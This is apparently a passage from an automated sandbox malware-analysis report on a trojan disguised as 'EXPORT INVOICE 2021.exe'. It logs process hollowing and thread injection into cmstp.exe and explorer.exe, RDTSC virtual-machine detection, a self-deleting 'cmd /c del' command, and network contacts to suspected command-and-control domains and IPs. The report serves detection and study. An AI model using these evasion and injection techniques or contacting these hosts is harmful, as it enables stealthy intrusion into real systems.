          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_048BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D48690 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D487C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D48710 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D485E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4868A NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D487BB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 8_2_02D4870A NtClose,
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671752764.0000000000A00000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.797551448.0000000000B60000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameCMSTP.EXE` vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.799092420.00000000017DF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe | Binary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe | Virustotal: Detection: 32%
          Source: EXPORT INVOICE 2021.exe | Metadefender: Detection: 17%
          Source: EXPORT INVOICE 2021.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Process created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Process created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EXPORT INVOICE 2021.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@10/2
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671512016.0000000000932000.00000002.00020000.sdmp, EXPORT INVOICE 2021.exe, 00000002.00000002.797206646.0000000000A92000.00000002.00020000.sdmp | Binary or memory string: INSERT INTO RolPermiso(RolPermiso_rol, RolPermiso_permiso) VALUES (;Error - Nuevo - RolPermisoDAL
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: EXPORT INVOICE 2021.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: EXPORT INVOICE 2021.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: initial sample | Static PE information: section name: .text entropy: 7.07298793214

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000002D38604 second address: 0000000002D3860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000002D3899E second address: 0000000002D389A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe TID: 6708 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Code function: 2_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Process information queried: ProcessInformation
          Source: explorer.exe, 00000004.00000000.743466087.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.739552326.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.743692325.000000000A716000.00000004.00000001.sdmp | Binary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.736762882.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04940EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04940EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04940EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04888A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04893A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04904257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04881B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04881B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0493138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04888794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04945BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0493131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04874F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04874F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe, Process queried: DebugPort
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Code function: 2_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Domain query: www.kalitelihavaperdesi.com
          Source: C:\Windows\explorer.exe, Network Connect: 51.161.86.13 80
          Source: C:\Windows\explorer.exe, Network Connect: 209.17.116.165 80
          Source: C:\Windows\explorer.exe, Domain query: www.ratqueen.art
          Source: C:\Windows\explorer.exe, Domain query: www.piedmontpines.school
          Source: C:\Windows\explorer.exe, Domain query: www.yuezhong66.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 350000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Memory written: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmstp.exe, Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Process created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}
          Source: C:\Windows\SysWOW64\cmstp.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: explorer.exe, 00000004.00000000.770612418.0000000000AD8000.00000004.00000020.sdmp, Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmp, Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmp, Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmp, Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmp, Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Queries volume information: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
